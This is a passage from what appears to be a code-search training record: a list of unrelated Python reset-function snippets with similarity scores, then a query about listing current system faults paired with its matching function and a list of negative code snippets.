"def should_show_reset_button(self):\r\n is_survey_question = (self.max_attempts == 0)\r\n\r\n if self.rerandomize in [\"always\", \"onreset\"]:\r\n\r\n # If the problem is closed (and not a survey question with max_attempts==0),\r\n # then do NOT show the reset button.\r\n # If the problem hasn't been submitted yet, then do NOT show\r\n # the reset button.\r\n if (self.closed() and not is_survey_question) or not self.is_submitted():\r\n return False\r\n else:\r\n return True\r\n # Only randomized problems need a \"reset\" button\r\n else:\r\n return False",
"def reset(self):\n# \n self.end_and_close()\n# self.sim.start()\n\n # Start the next simulation\n self.sim._model.swmm_open()\n self.sim._model.swmm_start()\n\n # get the state\n state = self._state()\n return state",
"def reset(self, p_int): # real signature unknown; restored from __doc__\n return False",
"def reset() -> None:\n ...",
"def is_ObsReset_allowed(self):\n handler = self.get_command_object(\"ObsReset\")\n return handler.check_allowed()",
"def test_reset(self, scml_system):\n scml_system._t = 12\n scml_system._k = 33\n state_space = scml_system.state_space\n state_positions = scml_system.state_positions\n initial_state = scml_system.reset()\n target = np.array([0, 0, 0, 0, 0, 0, 560]) / scml_system.limits\n assert np.all(initial_state == target), 'Initial states of the system are incorrect'\n assert scml_system._t == 0, 'Time of the system was not set to zero after reset'\n assert scml_system._k == 0, 'Episode step of the system was not set to zero after reset'\n assert scml_system.converter.reset_counter == scml_system.electrical_motor.reset_counter \\\n == scml_system.mechanical_load.reset_counter == scml_system.supply.reset_counter,\\\n 'The reset was not passed to all components of the SCMLSystem'\n assert scml_system._ode_solver.t == 0, 'The ode solver was not reset correctly'\n assert all(scml_system._ode_solver.y == np.zeros_like(\n scml_system.mechanical_load.state_names + scml_system.electrical_motor.CURRENTS, dtype=float\n )), ' The ode solver was not reset correctly'",
"def is_reset_task_states(self, task_state):\r\n return all(self.is_initial_child_state(child) for child in task_state)",
"def reset_state():\n return {'seer_info':[],\n 's_found_w_prev_night':False}",
"def soft_reset() -> None:\n ...",
"def _doReset(self):\n self._cmdReset()",
"def clean_reset(self):\n return self._jadeRpc('debug_clean_reset')",
"def _onReset(self):\n\n self.checked['idx'] = None\n self.accepted = True\n self.close()",
"def on_reset_button(self, event):\n text = _(u\"Reset button pressed.\")\n if self.state == 0:\n self.canvas_2d.render(text)\n else:\n self.canvas_3d.render()\n\n dialog_box = MyDialog_monitor(\n self, -1, _(u\"Select signals to monitor\"), self.names, self.devices, self.monitors)\n dialog_box.Destroy()\n\n global hold_monitor\n differential = hold_monitor\n\n hold_monitor = dict.fromkeys(hold_monitor, False)\n\n dialog_box = MyDialog_monitor(\n self, -1, _(u\"Select signals to monitor\"), self.names, self.devices, self.monitors)\n\n hold_monitor = differential\n dialog_box.ok_button(wx.EVT_BUTTON)\n\n dialog_box.Destroy()\n hold_monitor = dict.fromkeys(hold_monitor, False)\n if self.state == 0:\n self.canvas_2d.Refresh()\n else:\n self.canvas_3d.Refresh()\n global global_cycles_completed\n global_cycles_completed = 0",
"def reset() -> None:\n\t_flag.clear()",
"def reset(self):\n raise AssertionError(\"Reset function not implemented\")",
"def should_reset(self):\n # type: () -> bool\n if not self._is_cache_enabled():\n return False\n elapsed = time.time() - self._last_ts\n return elapsed > self._refresh_interval_sec",
"def fueling_reset(self):\n pos.select_dispenser(1)\n crindsim.swipe_card()\n if system.wait_for(lambda: \"debit\" in crindsim.get_display_text().lower(), verify = False):\n crindsim.press_softkey(\"no\")\n if system.wait_for(lambda: \"zip\" in crindsim.get_display_text().lower(), verify = False):\n crindsim.press_keypad(\"2\")\n crindsim.press_keypad(\"7\")\n crindsim.press_keypad(\"4\")\n crindsim.press_keypad(\"1\")\n crindsim.press_keypad(\"0\")\n crindsim.press_keypad(\"enter\")\n if system.wait_for(lambda: \"carwash\" in crindsim.get_display_text().lower(), verify = False):\n crindsim.press_softkey(\"no\")\n crindsim.lift_handle()\n crindsim.open_nozzle()\n pos.click(\"reset\")\n pos.click(\"yes\")\n crindsim.close_nozzle()\n crindsim.lower_handle()\n #Checks crind diag to see if reset message is displayed\n if not system.wait_for(lambda: \"reset\" in pos.read_dispenser_diag()[\"Status\"].lower(), verify = False):\n tc_fail(\"CRIND did not reset\")\n #Wait for crind to return to idle\n if not system.wait_for(lambda: \"idle\" in pos.read_dispenser_diag()[\"Status\"].lower(), timeout = 120, verify = False):\n tc_fail(\"CRIND did not return to idle\")\n pos.click(\"back\")",
"def test_reset():\n dev = _aws_device(wires=2)\n dev._circuit = CIRCUIT\n dev._task = TASK\n\n dev.reset()\n assert dev.circuit is None\n assert dev.task is None",
"def handle_warm_resets():\n\n # If we're in USB reset, we're actively receiving warm reset signaling; and we should reset\n # to the Rx.Detect.Reset state.\n with m.If(self.in_usb_reset):\n transition_to_state(\"Rx.Detect.Reset\")",
"def reset(self):\n self.success = False\n self.i = 0\n if self.monitor:\n self.env = gym.wrappers.Monitor(self.env, \"./mountaincar-monitor\", force=True)\n state = self.env.reset()\n state = self.preprocess_state(state)\n state = np.concatenate([state] * self.action_repeat)\n return state",
"def reset(self):\n self._do_exit.clear()",
"def test_reset(self):\n p1 = self.player()\n p1.reset()\n self.assertEqual(p1.history, [])\n self.assertEqual(p1.genome[0], C)",
"def sys_reset(self):\n result = self._lib.NRFJPROG_sys_reset()\n if result != NrfjprogdllErr.SUCCESS:\n raise APIError(result)",
"def reset(self):\n self.clock.reset()\n self.microgrid.reset();\n self.steps_beyond_done = None\n self.updateState();\n return self.state",
"def is_restarting(self) -> bool:\r\n return False",
"def reset(self):\r\n return self._api.reset()",
"async def send_reset(self):\n try:\n await self._send_command([PrivateConstants.SYSTEM_RESET])\n except RuntimeError:\n exit(0) #keep this??",
"def _reset(self):",
"def reset(self):\n while not self._check_episode_start_condition():\n self._simulate()\n self.state, _ = self._extract_state()\n return self.state",
"def is_onset(self):\n if self._onset:\n self._reset_onset = True\n return True\n return False",
"def hardreset(self, no_sleep=False):\n self.reset_pin.value = False\n time.sleep(0.2)\n self.reset_pin.value = True\n # wait for MicroPyton prompt\n if not no_sleep:\n self.__read_until(b'information.\\r\\n>>>', timeout=10)",
"def check_state(self):\n pass",
"def handle_reset(self):\n self.initialise()",
"def _reset(self):\n pass",
"def reset(self):\n \n pass",
"def unset_compare_state():\n global simulator\n if simulator is None:\n print \"program is not running\"\n return\n simulator.unset_compare_state()",
"def test_reset(u_boot_console):\n\n u_boot_console.run_command('reset', wait_for_prompt=False)\n assert(u_boot_console.validate_exited())",
"def _reset(self) -> None:",
"def _reset(self) -> None:",
"def check_for_macke(self):\n if self.current_roll.macke is True:\n self.continued = False\n self.score_before_end = self.total_score\n self.total_score = 0\n self.stopping_reason = \"Macke\"",
"def reset(self) -> None:\n # See section 7.2.2 of the datasheet for reset description.\n self._reset.value = True\n time.sleep(0.0001) # 100 us\n self._reset.value = False\n time.sleep(0.005) # 5 ms",
"def reset(self):\r\n _debug('simq03b_api.reset')\r\n self.write('*RST')\r\n self.query('*IDN?') # Pauses operation until fully reset?\r",
"def test_reset_reset(self):\n check_attr(self.o, 'reset')\n self.o.reset()\n self.subtest_someAgents(self.o, 2, 10)\n _0 = self.patch_agent_reset(self.o)\n # Démarrage des patches et stockage des mocks\n _1 = [_.start() for _ in _0 ]\n self.assertEqual(sum([_.call_count for _ in _1]), 0)\n self.o.reset()\n self.assertEqual(sum([_.call_count for _ in _1]), len(_0), \"individual calls expected\")\n # Fin du patching\n # for _ in _0 : _.stop()\n hum.patch.stopall()",
"def check_if_done_and_scored(self):\r\n return (self.state == self.DONE or self.ready_to_reset) and self.is_scored",
"def reset(self):\n if self.rnn:\n self.hs = None",
"def on_reset(qutest):\n\n qutest.expect_pause()\n qutest.glb_filter(FILTER.SM)\n qutest.loc_filter(QS_OBJ_KIND.SM_AO, 'AO_Philo<2>')\n qutest.Continue() # note continue in lower case. is a reserved word in python\n qutest.expect(\"===RTC===> St-Init Obj=AO_Philo<2>,State=QP::QHsm::top->thinking\")\n qutest.expect(\"===RTC===> St-Entry Obj=AO_Philo<2>,State=thinking\")\n qutest.expect(\"%timestamp Init===> Obj=AO_Philo<2>,State=thinking\")\n qutest.glb_filter(FILTER.SM, FILTER.AO, FILTER.UA)\n qutest.current_obj(QS_OBJ_KIND.SM_AO, 'AO_Philo<2>')",
"def _hard_reset(self):\n self._reset_specific_envs(np.ones_like(self.episodes_done))\n self._update_other_info()",
"def reset_mock():\n if not var_cache['local'].reset_mock_interface():\n raise AssertionError('reset mock server fail')",
"def reset_hands(self):\r\n\r\n self.player_rock = False\r\n self.player_paper = False\r\n self.player_scissors = False\r\n self.opp_rock = False\r\n self.opp_paper = False\r\n self.opp_scissors = False",
"def reset(self):\n while (True):\n index = self.expect([pexpect.TIMEOUT, SHELL_PROMPT], timeout=1)\n if index == 0:\n break",
"def reset(self):\n self.curr_episode += 1\n self.action_episode_memory.append([])\n self.is_game_done = False\n self.price = 1.00\n self.sendCmd(self.url,\"reset\")\n return self._get_state()",
"def reset(self):\n ...",
"def reset(self):\n ...",
"def _reset(self, reason: str=None):\n pass",
"async def forceshopreset(self, ctx:commands.Context):\r\n\r\n if not await self.IsSpecialized(ctx.guild, ctx.channel.id, SHOP_CHANNEL):\r\n await ctx.send('Cannot refresh the shops here\\nUse `add shop` to turn this channel into a shop')\r\n return\r\n\r\n await self.RefreshMerchants(ctx.guild, ctx.channel)",
"def Reset(self):\n self.prompt_str = self.prompt_ev.FirstPromptEvaluator()",
"def onReset(self):\n logger.info(\"Reset called\")\n self.mainGrid.reset()",
"def debug_reset(self):\n result = self._lib.NRFJPROG_debug_reset()\n if result != NrfjprogdllErr.SUCCESS:\n raise APIError(result)",
"def confirm_reset(self):\r\n confirm = QMessageBox.question(self,\r\n self.confirmDBClearTitleString,\r\n self.confirmDBClearQuestionString,\r\n QMessageBox.Yes |\r\n QMessageBox.No,\r\n QMessageBox.No)\r\n\r\n if confirm == QMessageBox.Yes:\r\n self.reset()",
"def _reset_state(self):\n\n self.state = None\n self.use_count = 0\n\n # Guards both state and use_count\n self.cond = threading.Condition()\n\n # Incremented each time we initialise a new mount state. Aids\n # debugging.\n self.generation = 0",
"def test_reset_default(self):\n check_attr(self.o, 'reset')\n self.subtest_noAgent(self.o)\n self.assertIsNone(self.o.reset(), \"no output expected\")\n self.subtest_someAgents(self.o, 2, 10)",
"def is_ringing(self) -> bool:",
"def reset_values(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"reset_values\")",
"def confirm_reset(self):\r\n confirm = QMessageBox.question(self,\r\n self.confirmDBClearTitleString,\r\n self.confirmDBClearQuestionString,\r\n QMessageBox.Yes |\r\n QMessageBox.No,\r\n QMessageBox.No)\r\n\r\n if confirm == QMessageBox.Yes:\r\n self.reset()",
"def reset(self):\n error_estop = \"\"\"\\\nE-Stop is ASSERTED. Disengage E-Stop and then reset the robot.\n\"\"\"\n error_nonfatal = \"\"\"Non-fatal Robot Error on reset.\nRobot reset cleared stopped state and robot can be enabled, but a non-fatal\nerror persists. Check diagnostics or rethink.log for more info.\n\"\"\"\n error_env = \"\"\"Failed to reset robot.\nPlease verify that the ROS_IP or ROS_HOSTNAME environment variables are set\nand resolvable. For more information please visit:\nhttp://sdk.rethinkrobotics.com/wiki/RSDK_Shell#Initialize\n\"\"\"\n is_reset = lambda: (self._state.enabled == False and\n self._state.stopped == False and\n self._state.error == False and\n self._state.estop_button == 0 and\n self._state.estop_source == 0)\n pub = rospy.Publisher('robot/set_super_reset', Empty, queue_size=10)\n\n if (self._state.stopped and\n self._state.estop_button == AssemblyState.ESTOP_BUTTON_PRESSED):\n rospy.logfatal(error_estop)\n raise IOError(errno.EREMOTEIO, \"Failed to Reset: E-Stop Engaged\")\n\n rospy.loginfo(\"Resetting robot...\")\n try:\n baxter_dataflow.wait_for(\n test=is_reset,\n timeout=3.0,\n timeout_msg=error_env,\n body=pub.publish\n )\n except OSError as e:\n if e.errno == errno.ETIMEDOUT:\n if self._state.error == True and self._state.stopped == False:\n rospy.logwarn(error_nonfatal)\n return False\n raise",
"def reset(self):\r\n _debug('api.reset()')\r\n self.write('*RST')\r\n self.query('*IDN?') # Pauses operation until fully reset?\r",
"def reset(self):\r\n _debug('api.reset()')\r\n self.write('*RST')\r\n self.query('*IDN?') # Pauses operation until fully reset?\r",
"def reset(self):\r\n _debug('api.reset()')\r\n self.write('*RST')\r\n self.query('*IDN?') # Pauses operation until fully reset?\r",
"def reset(self):\r\n _debug('api.reset()')\r\n self.write('*RST')\r\n self.query('*IDN?') # Pauses operation until fully reset?\r",
"def front_is_clear(): #py:front_is_clear\n return RUR._front_is_clear_()",
"def reset(self):\n pass",
"def reset(self):\n pass",
"def resetConfirm(self):\n\n ## Check if exposure is in progress\n if self.thread.isRunning():\n QtGui.QMessageBox.warning(self, \"Exposure warning.\", \"Exposure in progress, unable to close program.\", QtGui.QMessageBox.Ok)\n return\n\n else:\n reply = QtGui.QMessageBox.question(self, 'Confirmation','Are you sure you want to reset the STA3800 controller?',\n QtGui.QMessageBox.Yes | QtGui.QMessageBox.No,\n QtGui.QMessageBox.No)\n\n if reply == QtGui.QMessageBox.Yes:\n self.reset()",
"def test_reset(get_touchmat):\n touchmat = get_touchmat\n touchmat_model = check_device_types.get_device_model(touchmat)\n\n touchmat.state({'active_pen':False, 'touch': True})\n touchmat.reset()\n time.sleep(0.5)\n # The touchmat should disconnect and then reconnect. Loop for up to 5\n # seconds checking if it's connected\n count = 0\n while not touchmat.is_device_connected():\n assert count < 10\n time.sleep(0.5)\n count += 1\n\n assert touchmat.open_count() == 0\n touchmat.open()\n\n if touchmat_model == Devices.touchmat_g2:\n assert touchmat.state() == {'active_pen': True, 'touch': True}",
"def reset(self):\n\t\tpass"
] | [
"0.7329896",
"0.7245269",
"0.71851176",
"0.654862",
"0.63327384",
"0.6316024",
"0.62982106",
"0.62982106",
"0.62176245",
"0.62159413",
"0.6165632",
"0.61545885",
"0.6149942",
"0.6145588",
"0.61453944",
"0.61453944",
"0.6144835",
"0.61187637",
"0.60972834",
"0.6062806",
"0.6062806",
"0.6062806",
"0.6044876",
"0.6039784",
"0.6022954",
"0.6015995",
"0.6006247",
"0.59770674",
"0.5962392",
"0.59592724",
"0.59502363",
"0.59339696",
"0.5892891",
"0.58887976",
"0.58720845",
"0.5865067",
"0.58580583",
"0.5848671",
"0.5825117",
"0.58097345",
"0.5808804",
"0.5808103",
"0.5798437",
"0.57512146",
"0.574927",
"0.574854",
"0.57285374",
"0.5706746",
"0.57051265",
"0.57027316",
"0.56846815",
"0.56815845",
"0.56794125",
"0.5669732",
"0.5649703",
"0.5639878",
"0.5627954",
"0.56269467",
"0.56244546",
"0.5622466",
"0.56132674",
"0.5610611",
"0.56081647",
"0.56081647",
"0.56075543",
"0.5605868",
"0.5601147",
"0.55979073",
"0.55950165",
"0.55844754",
"0.5577915",
"0.5569721",
"0.55683094",
"0.55654395",
"0.55652344",
"0.55578077",
"0.55501324",
"0.55501324",
"0.55497766",
"0.5540723",
"0.55322856",
"0.55176854",
"0.55148816",
"0.55147165",
"0.55132496",
"0.5510481",
"0.5498479",
"0.5489164",
"0.5485085",
"0.5485081",
"0.5483661",
"0.5483661",
"0.5483661",
"0.5483661",
"0.5477527",
"0.5477446",
"0.5477446",
"0.54754746",
"0.5472219",
"0.5469649"
] | 0.6855109 | 3 |
This will get the current faults on the system. | def __get_faults_list(self, faults):
r_faults = []
for x in faults:
if faults[x]['value']:
r_faults.append(faults[x]['name'])
return r_faults | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_faults_current(self):\n request = self.get_option_from_shouter([t_16_Bit_Options.FAULT_ACTIVE], BP_TOOL.REQUEST_16)\n return self.__get_faults_list(self.config_16.faults_current)",
"def faults(self):\n debug(\"Getting faults...\")\n code = int(\"01001000\",2)\n command = pack('B',code)\n reply = self.query(command,count=2)\n faults = \" \"\n # The reply is 0xC8 followed by a faults status byte.\n if len(reply) != 2:\n if len(reply)>0:\n warn(\"%r: expecting 2-byte reply, got %r\" % (command,reply))\n elif self.connected:\n warn(\"%r: expecting 2-byte reply, got no reply\" % command)\n else:\n reply_code,bits = unpack('<BB',reply)\n if reply_code != code:\n warn(\"reply %r: expecting 0x%X(%s), got 0x%X(%s)\" %\n (reply,code,bin(code),reply_code,bin(reply_code)))\n else:\n fault_names = {0:\"Tank Level Low\",2:\"Temperature above alarm range\",\n 4:\"RTD Fault\",5:\"Pump Fault\",7:\"Temperature below alarm range\"}\n faults = \"\"\n for i in range(0,8):\n if (bits >> i) & 1:\n if i in fault_names: faults += fault_names[i]+\", \"\n else: faults += str(i)+\", \"\n faults = faults.strip(\", \")\n if faults == \"\": faults = \"none\"\n debug(\"Faults %s\" % faults)\n return faults",
"def get_faults_latched(self):\n request = self.get_option_from_shouter([t_16_Bit_Options.FAULT_LATCHED], BP_TOOL.REQUEST_16)\n return self.__get_faults_list(self.config_16.faults_latched)",
"def fault_counters(self):\n done, data = self._request('GF')\n if done:\n return {\n 'GFI self test': int(data[0], 16),\n 'Ground': int(data[1], 16),\n 'Stuck relay': int(data[2], 16)\n }\n\n raise EvseError",
"def _extend_fault_map(self):\n faults.FAULT_MAP.update({nsx_lib_exc.ManagerError:\n webob.exc.HTTPBadRequest,\n nsx_lib_exc.ServiceClusterUnavailable:\n webob.exc.HTTPServiceUnavailable,\n nsx_lib_exc.ClientCertificateNotTrusted:\n webob.exc.HTTPBadRequest,\n nsx_exc.SecurityGroupMaximumCapacityReached:\n webob.exc.HTTPBadRequest,\n nsx_lib_exc.NsxLibInvalidInput:\n webob.exc.HTTPBadRequest,\n nsx_exc.NsxENSPortSecurity:\n webob.exc.HTTPBadRequest,\n nsx_exc.NsxPluginTemporaryError:\n webob.exc.HTTPServiceUnavailable\n })",
"def fault():\n return FaultCohesiveKin()",
"def get_faults_history(self, epg_dn):\n class_query = ClassQuery('faultRecord')\n class_query.propFilter = 'eq(faultRecord.affected, \"' + epg_dn + '\")'\n return self.moDir.query(class_query)",
"def _isfault(self):\n return self.dp.state()==PyTango.DevState.FAULT",
"def sys_exc_info(self, for_hidden=False):\n return self.gettopframe()._exc_info_unroll(self.space, for_hidden)",
"def fault(self):\n return (self.status == self.STATUS_FAULT)",
"def fault_code(self):\n from numpy import nan\n debug(\"Getting faults...\")\n code = int(\"01001000\",2)\n command = pack('B',code)\n reply = self.query(command,count=2)\n fault_code = nan\n # The reply is 0xC8 followed by a faults status byte.\n if len(reply) != 2:\n if len(reply)>0:\n warn(\"%r: expecting 2-byte reply, got %r\" % (command,reply))\n elif self.connected:\n warn(\"%r: expecting 2-byte reply, got no reply\" % command)\n else:\n reply_code,fault_code = unpack('<BB',reply)\n if reply_code != code:\n warn(\"reply %r: expecting 0x%X(%s), got 0x%X(%s)\" %\n (reply,code,bin(code),reply_code,bin(reply_code)))\n fault_code = nan\n if fault_code == 2.0**7:\n fault_code = 8\n elif fault_code == 2.0**6:\n fault_code = 7\n elif fault_code == 2.0**5:\n fault_code = 6\n elif fault_code == 2.0**4:\n fault_code = 5\n elif fault_code == 2.0**3:\n fault_code = 4\n elif fault_code == 2.0**2:\n fault_code = 3\n elif fault_code == 2.0**1:\n fault_code = 2\n elif fault_code == 2.0**0:\n fault_code = 1\n elif fault_code == 0:\n fault_code = 0\n else:\n fault_code = -1\n debug(\"Fault code %s\" % fault_code)\n return fault_code",
"def check_page_faults(con, host, warning, critical,perf_data):\n warning = warning or 10\n critical = critical or 30\n data=get_server_status(con)\n\n try:\n page_faults=float(data['extra_info']['page_faults']) \n except:\n # page_faults unsupported on the underlaying system\n return exit_with_general_critical(\"page_faults unsupported on the underlaying system\")\n \n err,delta=maintain_delta([page_faults],host,\"page_faults\")\n if err==0:\n page_faults_ps=delta[1]/delta[0]\n message = \"Page faults : %.2f ps\" % page_faults_ps\n message+=performance_data(perf_data,[(\"%.2f\" %page_faults_ps,\"page_faults_ps\",warning,critical)])\n return check_levels(page_faults_ps,warning,critical,message)\n else:\n return exit_with_general_warning(\"problem reading data from temp file\")",
"def read_fault(filename):\n\n fault_x = []\n fault_y = []\n fault_file = open(filename)\n\n for segment in fault_file:\n x, y = segment.split()\n fault_x.append(float(x))\n fault_y.append(float(y))\n\n fault_file.close()\n\n return fault_x, fault_y",
"def _GetAbortRequests(self):\n new_requests = self._GetRequestsByState(self._ABORTING)\n for request_id in new_requests:\n logging.info('Abort requested for %s', request_id)\n self._ClearRequest(request_id, self._ABORTING)\n return new_requests",
"def __get_fault(self, mps_db_session, fault_id):\n fault = mps_db_session.query(models.Fault).filter(models.Fault.id==fault_id).all()\n\n if len(fault) == 1:\n return fault[0]\n elif len(fault) == 0:\n raise ValueError(\"Function \\\"__get_fault(fault_id={}). Not fault was found.\\\"\"\n .format(fault_id))\n else:\n raise ValueError(\"Function \\\"__get_fault(fault_id={}). More than one fault matches\\\"\"\n .format(fault_id))",
"def as_fault(self):\n return Fault(self.fault_code, self.internal_message or\n 'unknown server error')",
"def page_fault(self):\n self._page_fault += 1",
"def pageFault(proc):\n\n global pfList\n pfList.append([proc, 1])",
"def get_diagnostics(self) -> List[Diagnostic]:\n raise NotImplementedError",
"def get_unexpected_reboots(self):\n\n _, remaining_bootups = self.get_unmatched_events(\n event_cause_label=\"basic.reboot_trigger\",\n event_effect_label=\"basic.bootup\")\n\n return remaining_bootups",
"def remote_getStatus(self):\n zep = getFacade('zep')\n issues = zep.getDeviceIssues(eventClass=[Status_Mail],\n severity=[SEVERITY_WARNING, SEVERITY_ERROR, SEVERITY_CRITICAL])\n return [d\n for d, count, total in issues\n if getattr(self.config.devices, d, None)]",
"def faulty(self, *args):\n for each in args:\n if not self.is_faulty(each):\n self._faults.add(each)",
"def panic_on_fault_enabled(self):\n # The panic_on_fault mechanism might not even be included in the build\n # (in which case the panic_on_fault variables won't exist), so be defensive.\n try:\n enabled = self.chipdata.get_var_strict(\n 'L_panic_on_fault_enabled'\n ).value\n fault_id = self.chipdata.get_var_strict(\n 'L_panic_on_fault_id'\n ).value\n except ct.DebugInfoNoVariable:\n enabled = False\n fault_id = 0\n return (enabled, fault_id)",
"def errors_fatal(self) -> List[Error]:",
"def cpu_halt_reasons(self):\n buf_size = self.MAX_NUM_MOES\n buf = (structs.JLinkMOEInfo * buf_size)()\n num_reasons = self._dll.JLINKARM_GetMOEs(buf, buf_size)\n if num_reasons < 0:\n raise errors.JLinkException(num_reasons)\n\n return list(buf)[:num_reasons]",
"def is_faulty(self, event):\n for each in self._faults:\n if each.name.upper() == event.name.upper():\n return True\n return False",
"def exechost_status():\n\n exechost = socket.gethostname()\n\n # free\n try:\n subp = subprocess.Popen([\"free\", \"-m\"], stdout=subprocess.PIPE)\n output = subp.communicate()[0]\n print \"EXECSTAT %s FREE\\n%s\" % (exechost, output)\n except:\n print \"Problem running free command\"\n (extype, exvalue, trback) = sys.exc_info()\n traceback.print_exception(extype, exvalue, trback, limit=1, file=sys.stdout)\n print \"Ignoring error and continuing...\\n\"\n\n # df\n try:\n cwd = os.getcwd()\n subp = subprocess.Popen([\"df\", \"-h\", cwd], stdout=subprocess.PIPE)\n output = subp.communicate()[0]\n print \"EXECSTAT %s DF\\n%s\" % (exechost, output)\n except:\n print \"Problem running df command\"\n (extype, exvalue, trback) = sys.exc_info()\n traceback.print_exception(extype, exvalue, trback, limit=1, file=sys.stdout)\n print \"Ignoring error and continuing...\\n\"",
"def threat_exceptions(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"threat_exceptions\")",
"def fault_summary(request, accountId):\n if not accountId or len(accountId) == 0:\n return JSONResponse('No input parameter account_id.', status=400)\n\n token = query.getZabbixToken()\n print token\n if not token:\n LOG.exception('failed to query zabbix for token.')\n return JSONResponse('Failed to query zabbix for token.', status=500)\n\n data = query.getServiceState(accountId, token)\n print data\n if data == None:\n LOG.exception('failed to query zabbix for service state.')\n return JSONResponse('Failed to query zabbix for service state.', status=500)\n\n serviceData = normalizeServiceState(data)\n print serviceData\n result = {'service_state': {\n 'account_id': accountId,\n 'account_name': serviceData[0],\n 'hosts': serviceData[1]\n }}\n return JSONResponse(result)",
"def check_errors(self):\n\n errors = []\n while True:\n err = self.values(\"SYST:ERR?\")\n if int(err[0]) != 0:\n errmsg = \"Agilent 5313xA: {0}: {1}\".format(err[0], err[1])\n log.error(errmsg + '\\n')\n errors.append(errmsg)\n else:\n break\n\n return errors",
"def getExceptions(self):\n return self.getOrDefault(\"exceptions\")",
"def __exc_info(self):\n exctype, excvalue, tb = sys.exc_info()\n if sys.platform[:4] == 'java': ## tracebacks look different in Jython\n return (exctype, excvalue, tb)\n return (exctype, excvalue, tb)",
"def expand_faults():\n for (x, y) in SupvisorsFaults.__dict__.items():\n if not x.startswith('__'):\n setattr(Faults, x, y + FAULTS_OFFSET)",
"def expand_faults():\n for (x, y) in SupvisorsFaults.__dict__.items():\n if not x.startswith('__'):\n setattr(Faults, x, y + FAULTS_OFFSET)",
"def termination_status(self):\n res = {}\n for i in range(len(self)):\n res[i] = self.kernels[i].stop()\n return res",
"def exc_info(self):\n return self._exc_info",
"def geterr():\n return __errprof.state.copy()",
"def check_errors(self) -> None:\n # TODO check the manual for error codes & interpert them.\n return self.send(self.cmd.GET_GLOBALSTATUS_CURRENTERROR)",
"def clear_faults(self, session, params):\n\n session.set_status('running')\n yield self.acu_control.clear_faults()\n session.set_status('stopping')\n return True, 'Job completed.'",
"def get_number_of_crashes(result_info):\n assert isinstance(result_info, dict)\n # FIXME: We can't use analyse.get_generic_run_outcomes()\n # because we can't distinguish between a crash and an out\n # of memory situation properly\n #reports = analyse.get_generic_run_outcomes(result_info)\n is_merged_result = analyse.raw_result_info_is_merged(result_info)\n non_zero_exit_code_count = 0 # Only counted if it wasn't an out of memory run\n out_of_memory_count = 0\n if is_merged_result:\n assert isinstance(result_info['out_of_memory'], list)\n assert isinstance(result_info['exit_code'], list)\n assert len(result_info['out_of_memory']) == len(result_info['exit_code'])\n for index, oom in enumerate(result_info['out_of_memory']):\n corresponding_exit_code = result_info['exit_code'][index]\n if oom is True:\n out_of_memory_count += 1\n elif corresponding_exit_code is not None and corresponding_exit_code != 0:\n non_zero_exit_code_count += 1\n else:\n if result_info['out_of_memory'] is True:\n out_of_memory_count += 1\n elif result_info['exit_code'] is not None and result_info['exit_code'] != 0:\n non_zero_exit_code_count += 1\n return non_zero_exit_code_count + out_of_memory_count",
"def get_fault_info(filenames=['disk_sample_fault_tag.csv', 'disk_sample_fault_tag_201808.csv']):\n fault_df1 = pd.read_csv(os.path.join(conf.DATA_DIR, filenames[0]))\n fault_df2 = pd.read_csv(os.path.join(conf.DATA_DIR, filenames[1]))\n fault_df2.drop(['key'], axis=1,inplace=True)\n fault_tag_df = pd.concat([fault_df1, fault_df2], ignore_index=True)\n fault_dic = {}\n \n for _, row in fault_tag_df.iterrows():\n f_time = row[\"fault_time\"]\n tag = row[\"tag\"]\n key = tuple([row[\"manufacturer\"], row[\"model\"], row[\"serial_number\"]])\n if key not in fault_dic.keys():\n sub_dic = {}\n sub_dic[\"date\"] = f_time\n sub_dic[\"tag\"] = tag\n fault_dic[key] = sub_dic\n return fault_dic",
"def GetLongLineExceptions(self):\n return []",
"def diagnostic_trouble_codes(self):\n return self._diagnostic_trouble_codes",
"def get_exception_trap():\n return CRDS_EXCEPTION_TRAP",
"def get_crashing_anomaly_ids(self):\n\n crashing_anomalies = []\n\n for anomaly_id in self.get_anomaly_ids():\n if self.get_anomaly_error(anomaly_id) is not None:\n crashing_anomalies.append(anomaly_id)\n\n return crashing_anomalies",
"def GetFailures(self):\n return self._compute_client.all_failures",
"def server_fault(e):\n return \"Something went wrong, and it is our fault. Try reloading the page.\"",
"def dependencies(self):\n return self._dependency_analyzer.GetDependencies(\n [self.stacktrace.crash_stack] if self.stacktrace else [])",
"def trace(context=1):\r\n return getinnerframes(sys.exc_info()[2], context)",
"def Errcheck(self) -> list:\n\n myError = []\n\n ErrorList = self.myFieldFox.query(\"SYST:ERR?\").split(',')\n\n Error = ErrorList[0]\n\n if int(Error) == 0:\n\n print (\"+0, No Error!\")\n\n else:\n\n while int(Error)!=0:\n\n print (\"Error #: \" + ErrorList[0])\n\n print (\"Error Description: \" + ErrorList[1])\n\n myError.append(ErrorList[0])\n\n myError.append(ErrorList[1])\n\n ErrorList = self.myFieldFox.query(\"SYST:ERR?\").split(',')\n\n Error = ErrorList[0]\n\n myError = list(myError)\n\n return myError",
"def get_fatal_alerts(self, path):",
"def get_resources():\n # Acquire the lock...\n get_resources_lock.acquire()\n\n # ...but always release it\n try:\n # Construct the dictionaries as copies from nanny\n (limits,usage) = nanny.get_resource_information()\n\n\n # Calculate all the usage's\n pid = os.getpid()\n\n # Get CPU and memory, this is thread specific\n if ostype in [\"Linux\", \"Darwin\"]:\n \n # Get CPU first, then memory\n usage[\"cpu\"] = os_api.get_process_cpu_time(pid)\n\n # This uses the cached PID data from the CPU check\n usage[\"memory\"] = os_api.get_process_rss()\n\n # Get the thread specific CPU usage\n usage[\"threadcpu\"] = os_api.get_current_thread_cpu_time() \n\n\n # Windows Specific versions\n elif ostype in [\"Windows\"]:\n \n # Get the CPU time\n usage[\"cpu\"] = windows_api.get_process_cpu_time(pid)\n\n # Get the memory, use the resident set size\n usage[\"memory\"] = windows_api.process_memory_info(pid)['WorkingSetSize'] \n\n # Get thread-level CPU \n usage[\"threadcpu\"] = windows_api.get_current_thread_cpu_time()\n\n # Unknown OS\n else:\n raise EnvironmentError(\"Unsupported Platform!\")\n\n # Use the cached disk used amount\n usage[\"diskused\"] = cached_disk_used\n\n finally:\n # Release the lock\n get_resources_lock.release()\n\n # Copy the stop times\n stoptimes = process_stopped_timeline[:]\n\n # Return the dictionaries and the stoptimes\n return (limits,usage,stoptimes)",
